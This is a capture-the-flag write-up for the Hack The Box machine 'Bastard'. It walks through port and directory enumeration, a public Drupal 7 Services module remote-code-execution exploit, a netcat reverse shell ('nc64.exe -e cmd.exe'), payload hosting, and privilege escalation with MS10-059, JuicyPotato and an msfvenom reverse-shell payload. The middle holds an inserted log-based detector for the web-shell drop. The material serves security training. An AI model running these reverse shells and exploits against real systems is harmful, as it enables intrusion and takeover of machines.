Hack The Box: Bastard Write-up (#33)

Reconnaissance

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.9
  • -sC: Default Nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535
  • 80: Running HTTP service, Microsoft IIS httpd 7.5
  • 135: Running Microsoft Windows RPC
  • 49154: Running Microsoft Windows RPC
Nmap scan report for ip-10-10-10-9.ap-southeast-1.compute.internal (10.10.10.9)
Host is up (0.0089s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
...
  1. Port 80 is running Microsoft IIS version 7.5, which is associated with the Windows 7 / Windows Server 2008 R2 generation of the Operating System (OS). It is hosting Drupal 7. Most likely this will be our entry point to the box.
  2. Ports 135 and 49154 are associated with the Microsoft RPC service. We can do basic enumeration of them with the Nmap NSE scripts.

Service Enumeration

Port 80 (HTTP service)

python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php
  • -u: Target URL
  • -w: Wordlist
  • -e: File extension
[13:20:16] Starting: 
[13:24:23] 400 - 324B - /%ff/
[13:24:24] 200 - 8KB - /%3f/
[13:24:29] 200 - 7KB - /0
[13:53:02] 200 - 108KB - /changelog.txt
[14:18:49] 301 - 150B - /includes -> http://10.10.10.9/includes/
[14:19:42] 200 - 7KB - /index.php
[14:20:26] 200 - 2KB - /install.mysql.txt
[14:20:26] 200 - 2KB - /install.pgsql.txt
[14:20:30] 200 - 18KB - /install.txt
[14:20:31] 200 - 3KB - /install.php
[14:23:34] 200 - 18KB - /license.txt
[14:26:54] 200 - 9KB - /MAINTAINERS.txt
[14:29:40] 301 - 146B - /misc -> http://10.10.10.9/misc/
[14:30:16] 301 - 149B - /modules -> http://10.10.10.9/modules/
[14:32:37] 200 - 7KB - /node
[14:41:04] 301 - 150B - /profiles -> http://10.10.10.9/profiles/
[14:42:04] 200 - 5KB - /readme.txt
[14:42:44] 200 - 62B - /rest/
[14:42:51] 200 - 2KB - /robots.txt
[14:43:24] 301 - 149B - /scripts -> http://10.10.10.9/scripts/
[14:46:11] 301 - 147B - /sites -> http://10.10.10.9/sites/
[14:51:17] 301 - 148B - /themes -> http://10.10.10.9/themes/
[14:52:48] 200 - 10KB - /UPGRADE.txt
[14:53:29] 200 - 7KB - /user
[14:53:36] 200 - 7KB - /user/
[14:53:39] 200 - 7KB - /user/login/
[14:59:26] 200 - 42B - /xmlrpc.php

Exploitation

searchsploit drupal 7 remote code execution
searchsploit -m 41564.php
https://www.ambionics.io/blog/drupal-services-module-rce
# Three stages:
# 1. Use the SQL Injection to get the contents of the cache for current endpoint
# along with admin credentials and hash
# 2. Alter the cache to allow us to write a file and do so
# 3. Restore the cache
...
$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/dixuSOspsOUU.php
{
"uid": "1",
"name": "admin",
"mail": "drupal@hackthebox.gr",
"theme": "",
"created": "1489920428",
"access": "1599707255",
"login": 1599729403,
"status": "1",
"timezone": "Europe\/Athens",
"language": "",
"picture": null,
"init": "drupal@hackthebox.gr",
"data": false,
"roles": {
"2": "authenticated user",
"3": "administrator"
},
"rdf_mapping": {
"rdftype": [
"sioc:UserAccount"
],
"name": {
"predicates": [
"foaf:name"
]
},
"homepage": {
"predicates": [
"foaf:page"
],
"type": "rel"
}
},
"pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"
}
{
"session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
"session_id": "RW7tPSxNdc5UP8TPkKtSBzobkdBNpJKsmv318gHi56A",
"token": "k47rjRP3P-5SI2dlBQ9uOblKtfWqrUsiE6QhlYzKy3E"
}
root@kali:/htb/Bastard# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.9 - - [11/Sep/2020 01:17:46] "GET /nc64.exe HTTP/1.0" 200 -
10.10.10.9 - - [11/Sep/2020 01:17:53] "GET /shell.php HTTP/1.0" 200 -
nc -nlvp 53
nc64.exe -e cmd.exe 10.10.14.31 53
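From the defender's side, the chain above leaves a recognisable trace in the IIS logs: a POST to the Services REST endpoint, then requests for a PHP file with a random name that never existed in the Drupal web root. The detector below is an added example (not part of the write-up or of the exploit) that runs over a constructed IIS W3C log excerpt; the allowlist of top-level Drupal 7 PHP files and the 120-second correlation window are assumptions of this example.

```python
from datetime import datetime

# Constructed IIS W3C log excerpt (not taken from the box): a POST to the
# Services REST login resource, then requests for a random-named PHP file.
IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2020-09-11 01:15:02 10.10.10.9 GET /user/login - 80 10.10.14.31 Mozilla/5.0 200
2020-09-11 01:15:40 10.10.10.9 POST /rest/user/login - 80 10.10.14.31 python-requests/2.24 200
2020-09-11 01:15:41 10.10.10.9 GET /dixuSOspsOUU.php - 80 10.10.14.31 python-requests/2.24 200
2020-09-11 01:16:10 10.10.10.9 GET /index.php q=node 80 10.10.14.50 Mozilla/5.0 200
2020-09-11 01:17:53 10.10.10.9 GET /dixuSOspsOUU.php - 80 10.10.14.31 Mozilla/5.0 200
"""

# PHP files that legitimately live in a Drupal 7 web root (assumed allowlist);
# any other top-level .php is a candidate dropped web shell.
KNOWN_ROOT_PHP = {"/index.php", "/install.php", "/update.php", "/cron.php",
                  "/xmlrpc.php", "/authorize.php"}
SERVICES_PREFIX = "/rest/"   # endpoint path found during enumeration
WINDOW_SECONDS = 120         # assumed: REST POST -> new .php within 2 min is "high"

def parse_iis(text):
    """Turn W3C extended log text into dicts keyed by the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def detect_services_rce(rows):
    """Flag requests for unexpected top-level .php files; escalate to 'high'
    when the same client POSTed to the Services endpoint shortly before."""
    alerts, last_rest_post = [], {}
    for r in rows:
        ts = datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S")
        ip, uri = r["c-ip"], r["cs-uri-stem"].lower()
        if r["cs-method"] == "POST" and uri.startswith(SERVICES_PREFIX):
            last_rest_post[ip] = ts          # remember the endpoint write step
            continue
        if uri.count("/") == 1 and uri.endswith(".php") and uri not in KNOWN_ROOT_PHP:
            recent = ip in last_rest_post and \
                (ts - last_rest_post[ip]).total_seconds() <= WINDOW_SECONDS
            alerts.append(("high" if recent else "medium", ip, uri, ts.isoformat()))
    return alerts

if __name__ == "__main__":
    for alert in detect_services_rce(parse_iis(IIS_LOG)):
        print(*alert)
```

The second hit for the same file falls outside the window and is reported as "medium", so a file dropped earlier and revisited later still surfaces.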

Post-Exploitation Enumeration

python /usr/share/doc/python3-impacket/examples/smbserver.py tools .
systeminfo > //10.10.14.31/tools/systeminfo.txt
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2020-09-11-mssb.xls --systeminfo /htb/Bastard/systeminfo.txt

Privilege Escalation

nc -nlvp 443
MS10-059.exe 10.10.14.31 443

Extra Content

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=53 -o shell.exe
nc -nlvp 53
JuicyPotato.exe -l 1337 -p C:\inetpub\drupal-7.54\shell.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
  • -t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
  • -p <program>: program to launch
  • -l <port>: COM server listen port
  • -c <{clsid}>: CLSID (default BITS: {4991d34b-80a1-4291-83b6-3328366b9097})

Attack Strategy Map

[Attack strategy map figure not reproduced in the text]
